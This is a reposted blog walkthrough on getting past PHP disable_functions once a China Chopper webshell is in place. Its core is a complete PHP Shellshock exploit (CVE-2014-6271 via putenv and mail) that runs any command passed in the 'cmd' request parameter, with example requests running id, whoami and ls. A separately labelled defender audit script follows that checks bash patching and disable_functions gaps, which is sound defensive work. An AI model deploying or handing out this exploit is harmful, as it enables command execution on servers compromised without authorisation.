Bypassing disable_functions with the LD_PRELOAD approach

Reference: https://github.com/l3m0n/Bypass_Disable_functions_Shell

Another entry in the "connected with Caidao (China Chopper) but can't execute commands" series.

Go look at phpinfo (don't ask me how; if you can already upload a one-line webshell, phpinfo is not the problem).

Wow, that many functions disabled. What now?

Fine, I went looking for a method.

I tried the pcntl_exec method without success, so let's use the LD_PRELOAD bypass (via mail).

Say no more, upload the shell:

```php
<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

function shellshock($cmd) {
	// Execute a command via CVE-2014-6271 @mail.c:283
	$tmp = tempnam(".", "data");
	putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
	// In Safe Mode, the user may only alter environment variables whose names
	// begin with the prefixes supplied by this directive.
	// By default, users will only be able to set environment variables that
	// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
	// PHP will let the user modify ANY environment variable!
	mail("[email protected]", "", "", "", "-bv"); // -bv so we don't actually send any mail
	$output = @file_get_contents($tmp);
	@unlink($tmp);
	if ($output != "") {
		return $output;
	} else {
		return "No output, or not vuln.";
	}
}
echo shellshock($_REQUEST["cmd"]);
?>
```

Of course, this was written by a master; the author's name is kept.

When executing, you naturally have to use the full path to the binary.

For example (prepend the site URL yourself):

exp.php?cmd=/sbin/ifconfig

exp.php?cmd=/bin/ls

exp.php?cmd=/usr/bin/id

exp.php?cmd=/usr/bin/whoami
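The technique above needs two things to line up on the server: a bash that still honours function definitions imported through the environment (CVE-2014-6271), and a PHP configuration that leaves putenv() and mail() (or pcntl_exec) outside disable_functions. The following audit script is added here as an example; it is not part of the original post or the referenced exploit. It checks the local bash with the standard public probe and reports which of those PHP primitives a given disable_functions value (the string you would copy out of phpinfo) still leaves enabled. The sample disable_functions value at the bottom is constructed.

```sh
#!/bin/sh
# Defender-side audit for the preconditions of the mail()/putenv() Shellshock
# bypass: an unpatched bash and incomplete disable_functions coverage.

# Prints "vulnerable" if the local bash executes a command appended to a
# function definition imported from the environment (CVE-2014-6271),
# "patched" if it does not, and "no-bash" if bash is not installed.
bash_shellshock_status() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return; }
    out=$(env X='() { :;}; echo SHELLSHOCK_MARKER' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo vulnerable ;;
        *) echo patched ;;
    esac
}

# Takes a disable_functions value (comma-separated, as shown in phpinfo) and
# prints the primitives this bypass relies on that are NOT in the list,
# space-separated. Empty output means all three are blocked.
missing_disable_functions() {
    list=",$(printf '%s' "$1" | tr -d ' '),"
    missing=""
    for fn in putenv mail pcntl_exec; do
        case "$list" in
            *",$fn,"*) ;;
            *) missing="$missing $fn" ;;
        esac
    done
    printf '%s\n' "${missing# }"
}

# Constructed sample: a typical "exec family only" disable_functions value.
SAMPLE='exec,system,passthru,shell_exec,popen,proc_open'
echo "bash: $(bash_shellshock_status)"
echo "still enabled: $(missing_disable_functions "$SAMPLE")"
```

On a host that only blocks the exec family, the second line reports `putenv mail pcntl_exec`, which is exactly the gap the shell above walks through; adding those names to disable_functions (and patching bash) closes it. The bash probe only echoes a marker, so it is safe to run on production hosts.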

You're welcome~


Reposted from blog.csdn.net/Jiajiajiang_/article/details/98615826